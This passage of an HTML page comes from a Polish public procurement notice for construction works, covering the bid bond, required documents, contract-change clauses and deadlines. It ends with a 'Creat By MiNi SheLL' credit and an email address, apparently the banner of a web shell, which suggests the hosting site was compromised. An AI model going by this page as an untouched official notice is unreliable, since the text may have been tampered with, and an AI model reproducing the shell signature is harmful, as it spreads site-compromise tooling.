osobami.<br/>2. Zamawiający wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni od dnia wezwania podmiotowych środków dowodowych<br/>aktualnych na dzień składania.<br/>3. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia<br/>wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>4. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta złożona przez Wykonawcę powinna zawierać:<br/>1) Formularz ofertowy;<br/>2) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy(np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do<br/>reprezentowania Wykonawców w postępowaniu lub do reprezentowania w postępowaniu i<br/>zawarcia umowy;<br/>3) Pełnomocnictwo do złożenia oferty względnie do podpisania podmiotowych środków<br/>dowodowych, lub innych oświadczeń i dokumentów składanych wraz z Ofertą, chyba że prawo<br/>do ich podpisania wynika z dokumentów, o których mowa w pkt. 14.18. ust. 2 SWZ;<br/>4) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z<br/>uwzględnieniem postanowień pkt. 16. 5 SWZ.<br/>5) Zobowiązania wymagane postanowieniami pkt. 10.3. SWZ, w przypadku gdy Wykonawca<br/>polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania<br/>danego zobowiązania nie wynika z dokumentów, o których mowa w pkt. 14.18. ust. 2 SWZ.<br/>6) Oświadczenia wymagane postanowieniami pkt. 9.2., 10.7. i 11.3 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 60.000,00 PLN<br/>(słownie: sześćdziesiąt tysięcy złotych 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy<br/>Zamawiającego: BS w Ciechanowcu nr rachunku: 54 8749 0006 0000 1241 2000 0070<br/>z adnotacją „Wadium – Znak sprawy: RI.271.7.2022”.<br/>4. Za skuteczne wniesienie wadium w pieniądzu, zamawiający uzna wadium, które znajdzie się<br/>na rachunku bankowym zamawiającego przed upływem terminu składania ofert.<br/>5. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. Gwarancja lub<br/>poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy<br/>dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne<br/>żądanie Zamawiającego.<br/>6. W przypadku wnoszenia wadium w formie innej niż pieniężna, zamawiający wymaga<br/>dołączenia oryginału dokumentu wadialnego (gwarancji lub poręczenia) do oferty.<br/>7. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w<br/>którym upływa termin składania ofert.<br/>8 Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej okoliczności:<br/>1) Upływu terminu związania ofertą,<br/>2) Zawarcia umowy w sprawie zamówienia publicznego,<br/>3) Unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert,<br/>2) którego oferta została odrzucona,<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza,<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>10. Zamawiający zwraca wadium wykonawcy, którego oferta została wybrana jako<br/>najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.<br/>11. Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 16.9. powoduje rozwiązanie<br/>stosunku prawnego z wykonawcą z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Prawo zamówień publicznych.<br/>12. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, o których mowa w pkt. 16.2 lit. b) - d), występuje odpowiednio<br/>do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1<br/>ustawy, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1, oświadczenia którym mowa w art. 125 ust. 1, innych dokumentów lub<br/>oświadczeń lub nie wyraził zgody poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt. 3, co<br/>spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę, jako<br/>najkorzystniejszej;<br/>2) wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie;<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie<br/>warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt. 7.1. SWZ<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 9.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, są oni zobowiązani<br/>na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe,<br/>o których mowa w pkt. 9 SWZ, przy czym:<br/>1) Podmiotowe środki dowodowe, o których mowa w pkt. 9.8 SWZ składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzy wykazują spełnianie warunku, w zakresie i na zasadach<br/>opisanych w pkt. 7.1 SWZ;<br/>2) Dokumenty i oświadczenia o których mowa w pkt. 9.7 SWZ składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość wprowadzenia zmian w Umowie w zakresie wynikającym<br/>z przepisów prawa zamówień publicznych w zakresie terminów wykonania przedmiotu Umowy,<br/>określonych w § 3 Umowy, jeżeli niedotrzymanie terminu/terminów umownych przez<br/>Wykonawcę będzie następstwem:<br/>1) okoliczności niemożliwych do przewidzenia w momencie zawierania Umowy<br/>(w szczególności konieczności wykonania zamiennych robót niemożliwych do przewidzenia na<br/>podstawie Dokumentacji na etapie składania oferty, których wykonanie warunkuje prawidłowe<br/>wykonanie przedmiotu Umowy), w tym jeżeli nastąpi wstrzymanie wykonywania robót przez<br/>właściwy organ administracji publicznej z przyczyn niezależnych od Wykonawcy,<br/>2) wystąpienia wyjątkowo niekorzystnych, ponadprzeciętnych i ponadnormatywnych<br/>(odbiegających od typowych) warunków atmosferycznych (niemożliwych do przewidzenia na<br/>datę zawierania Umowy) uniemożliwiających prawidłowe wykonanie robót, w szczególności z<br/>powodu technologii realizacji prac określonej Umową, normami lub innymi przepisami, jeżeli<br/>konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność,<br/>3) stwierdzenia wystąpienia warunków terenu budowy odbiegających w sposób istotny od<br/>przyjętych w dokumentacji projektowej, w szczególności zaistnienia konieczności prowadzenia<br/>prac archeologicznych, nieprzewidzianych w dokumentacji lub prac mających na celu usuwanie<br/>niewybuchów lub niewypałów,<br/>4) wystąpienia opóźnienia lub zaniechania w dokonaniu czynności (w tym wydaniu orzeczeń)<br/>przez właściwe organy administracji publicznej, których dokonanie jest niezbędne dla<br/>prawidłowości wykonania Umowy, które nie są następstwem okoliczności, za które Wykonawca<br/>ponosi odpowiedzialność,<br/>5) opóźnienia w przekazaniu placu budowy z przyczyn leżących po stronie Zamawiającego,<br/>6) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy.<br/>2. Każdorazowo zakres zmiany terminu wykonania Umowy winien być adekwatny do przyczyny<br/>powstania konieczności jego dokonania, a jego wymiar (zakres zmiany terminu) powinien być<br/>uwzględniać czas trwania przeszkody. Jeżeli w związku ze zmianą terminu po stronie<br/>Wykonawcy wystąpią dodatkowe koszty wpływające na wartość Wynagrodzenia, Wykonawca<br/>przedstawi ich szczegółową kalkulację. Podpisanie przez Strony aneksu zmieniającego termin wykonania Umowy skutkuje wygaśnięciem ewentualnych roszczeń Wykonawcy w zakresie<br/>dodatkowych kosztów, o których mowa w zdaniu 2, chyba że Strony wyraźnie przewidziały<br/>zmianę Wynagrodzenia uwzględniającą w sposób adekwatny te koszty.<br/>3. Zamawiający dopuszcza możliwość wprowadzenia zmian w Umowie w zakresie wynikającym<br/>z przepisów prawa zamówień publicznych, w zakresie zmiany materiałów, parametrów<br/>technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania<br/>przedmiotu Umowy, jak również będącej skutkiem takich zmian – zmiany wartości<br/>Wynagrodzenia w następujących sytuacjach:<br/>1) konieczności realizacji robót wynikających z wprowadzenia przez Zamawiającego<br/>(z przyczyn leżących po stronie Zamawiającego lub będących skutkiem przypadków<br/>niezależnych od obu stron Umowy) w Dokumentacji zmian uznanych za istotne i nieistotne<br/>odstępstwo od projektu budowlanego, w rozumieniu przepisów prawa budowlanego,<br/>niezbędnych dla prawidłowego wykonania przedmiotu Umowy,<br/>2) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej<br/>postanowieniami.<br/>4. Zamawiający dopuszcza możliwość wprowadzenia zmian w Umowie w zakresie wynikającym<br/>z przepisów prawa zamówień publicznych, co do wartości Wynagrodzenia w przypadku:<br/>1) zmiany wysokości stawki podatku od towarów i usług,<br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.<br/>3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę lub/ i zasad<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki<br/>składki na ubezpieczenia społeczne lub zdrowotne,<br/>cdn. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ciąg dalszy zmian umowy<br/>3) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych, co będzie<br/>miało wpływ na wartość Wynagrodzenia należnego Wykonawcy.<br/>5. Zmiana wysokości wynagrodzenia należnego Wykonawcy, dokonana na skutek jego wniosku,<br/>dotyczyć może wyłącznie wynagrodzenia należnego za niewykonaną, od dnia wejścia życie<br/>zmian przepisów cześć Umowy. Zmiana wysokości wynagrodzenia obowiązywać może nie<br/>wcześniej niż od dnia wejścia w życie zmian przepisów. W wypadku zmiany wartości podatku od towarów i usług wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie<br/>wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.<br/>6. Wykonawca może wystąpić z wnioskiem do Zamawiającego o zmianę wynagrodzenia<br/>należnego z tytułu realizacji Umowy, zmianę w zakresie terminów wykonania przedmiotu<br/>Umowy nie później niż w terminie do 30 dni od dnia zaistnienia przyczyny dokonania<br/>wnioskowanej zmiany. Wykonawca zobowiązany jest udowodnić Zamawiającemu realny wpływ<br/>zmian, o których mowa w ppkt. 27.2. – 27.4 SWZ na wartość należnego mu wynagrodzenia, w<br/>szczególności przedłożyć wykaz personelu, który realizuje przedmiot Umowy i dla którego ma<br/>zastosowanie zmiana wraz z kalkulacją kosztów wynikającą z przedmiotowej zmiany. Jeżeli<br/>przyczyna stanowi przeszkodę w wykonywaniu robót Wykonawca zgłosi niezwłocznie tę<br/>okoliczność na piśmie, i jeszcze w trakcie jej trwania podejmie wszelkie dostępne środki, aby<br/>zminimalizować negatywne dla Zamawiającego skutki zaistnienia przeszkody. Zamawiający nie<br/>jest związany wnioskiem Wykonawcy, ani co do zasady, ani do wartości, czy proponowanego<br/>terminu przesunięcia terminów wykonania Umowy.<br/>7. Strony ustalą wartość odpowiednio robót, materiałów i urządzeń zamiennych, zaniechanych,<br/>dodatkowych w oparciu o zaakceptowany przez Zamawiającego kosztorys różnicowy<br/>szczegółowy sporządzony w następujący sposób:<br/>1) wartość robót zaniechanych (tj. niewykonanych z powodu rezygnacji przez Zamawiającego)<br/>zostanie ustalona w oparciu o ceny zawarte w kosztorysie ofertowym, a w przypadku braku<br/>takiej możliwości, w oparciu o ceny nie wyższe niż średnie ceny określone w wydawnictwie<br/>SEKOCENBUD dla województwa podlaskiego w dniu składania oferty,<br/>2) wartość materiałów i urządzeń, z których użycia zrezygnował Zamawiający zostanie ustalona<br/>w oparciu o ceny zawarte w kosztorysie ofertowym, a w przypadku braku takiej możliwości w<br/>oparciu o ceny nie wyższe niż średnie ceny określone w wydawnictwie SEKOCENBUD dla<br/>województwa podlaskiego w dniu składania oferty,<br/>3) wartość zamówionych lub zaakceptowanych na piśmie przez Zamawiającego robót<br/>zamiennych zostanie ustalona w oparciu postanowienia § 23 Umowy,<br/>4) wartość materiałów i urządzeń użytych (pod warunkiem ich uprzedniej pisemnej akceptacji<br/>przez Zamawiającego) w miejsce materiałów i urządzeń, o których mowa w ppkt 2 niniejszego<br/>ustępu (zamiennych) zostanie ustalona w oparciu o ceny zawarte w kosztorysie ofertowym, a w<br/>przypadku braku takiej możliwości, w oparciu o ceny nie wyższe niż o średnie ceny określone w<br/>wydawnictwie SEKOCENBUD dla województwa podlaskiego aktualnego na datę dokonania<br/>zmiany. W przypadku braku cen urządzeń lub materiałów w wydawnictwie SEKOCENBUD, cena<br/>zostanie ustalona w oparciu o rozeznanie rynku,<br/>5) wszystkie kosztorysy i wyceny sporządza Wykonawca na swój koszt.<br/>8. Ponadto Umowa może zostać zmieniona w związku z wystąpieniem okoliczności wskazanych<br/>w art. 455 prawa zamówień publicznych i na zasadach wynikających z przepisów prawa<br/>zamówień publicznych.<br/>9. Każdorazowo zmiana Umowy wymaga zgodnej woli Stron, a wskazane w niniejszym<br/>paragrafie podstawy jej dokonania nie stanowią obowiązku dokonania zmian, lecz uprawnienie<br/>Stron.

Creat By MiNi SheLL
Email: jattceo@gmail.com